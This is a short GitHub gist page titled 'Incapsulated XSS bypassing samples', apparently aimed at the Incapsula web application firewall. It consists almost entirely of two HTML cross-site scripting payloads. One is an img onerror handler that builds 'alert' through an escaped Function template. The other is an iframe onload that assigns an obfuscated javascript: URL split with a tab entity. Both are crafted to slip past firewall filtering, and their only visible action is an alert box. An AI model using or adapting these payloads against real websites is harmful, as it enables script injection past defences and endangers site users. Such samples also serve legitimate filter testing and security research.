Skip to content

Instantly share code, notes, and snippets.

@yamishi13
Last active August 24, 2017 05:36
Show Gist options
  • Save yamishi13/2c970f84a3015cc26412ae5211165c40 to your computer and use it in GitHub Desktop.
Save yamishi13/2c970f84a3015cc26412ae5211165c40 to your computer and use it in GitHub Desktop.
Incapsulated XSS bypassing samples
<html>
<img/src=q onerror='new Function`al\ert\`Image onerror XSS\``'>
</html>
<html>
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert`Iframe onload XSS`"';>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment